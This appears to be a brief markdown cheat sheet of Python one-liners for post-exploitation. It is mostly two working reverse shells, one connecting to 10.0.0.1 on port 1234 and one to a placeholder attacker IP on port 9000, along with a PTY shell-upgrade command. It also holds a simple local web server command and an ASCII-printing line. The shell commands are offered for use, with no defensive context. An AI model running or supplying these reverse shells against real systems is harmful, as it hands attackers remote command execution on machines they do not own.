2013-12-17 20:27:03 +00:00

1.0 KiB

Python Command and Scripts for Post Exploitation

One liners

Start a web server that serves the local files on port 8000, single threaded

python -m SimpleHTTPServer 8000```

**Python reverse shell from [pentestmonkey.net](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)**
```python 
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'```

**Reverse Shell to YOURIP on port 9000**
```python
python -c "import socket,subprocess,os;host=\"[YOURIP]\";port=9000;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"```

**Spawn bash shell prompt**
```python
python -c 'import pty; pty.spawn("/bin/bash")'```

***Print all ASCII characters***
```python
python -c 'import string; print string.printable'```